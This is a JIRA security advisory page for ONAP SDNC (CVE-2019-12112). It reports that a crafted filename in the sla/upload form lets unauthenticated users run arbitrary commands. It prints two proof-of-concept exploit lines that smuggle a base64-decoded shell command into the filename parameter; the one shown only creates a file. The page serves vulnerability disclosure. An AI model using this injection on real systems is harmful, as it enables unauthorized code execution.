Uploaded image for project: 'ONAP JIRA Security Issues'
  1. ONAP JIRA Security Issues
  2. OJSI-199

SDNC service allows for arbitrary code execution in sla/upload form (CVE-2019-12112)

CloneClone+Clone++
    XMLWordPrintable

Details

    Description

      SDNC allows any user for arbitrary code execution in upload form.
      Sample payload below.

      Path: oam/admportal/server/router/routes/sla.js:149

      Url: http://<IP>:30201/sla/upload

      Exploit: touch '|| echo L3RtcC9kZ1VwbG9hZA== | base64 -d | xargs touch #'
      Exploit: http -f 'http://<IP>:30201/sla/upload' filename@||\ echo\ L3RtcC9kZ1VwbG9hZA\=\=\ |\ base64\ -d\ |\ xargs\ touch#

      Impact description (draft)

      Title: SDNC service allows for arbitrary code execution in sla/dgUpload form

      Reporter: Jakub Botwicz, Wojciech Rauner, Łukasz Wrochna and Radosław Żeszczuk from Samsung

      Products: SDNC

      Affects: Casablanca and earlier

      Description:

      Jakub Botwicz, Wojciech Rauner, Łukasz Wrochna and Radosław Żeszczuk from Samsung  reported a vulnerability in SDNC.. By executing sla/upload with a crafted filename parameter an unauthenticated attacker can execute arbitrary command. All SDC setups which includes admportal are affected.

      Note:

      Dublin release is not vulnerable for this attack because the admportal has been disabled but the code itself is still vulnerable.

       

      Attachments

        # Subject Branch Project Status CR V

        Activity

          People

            arotundo Alfred Rotundo
            kopasiak Krzysztof Opasiak
            Votes:
            0 Vote for this issue
            Watchers:
            4 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: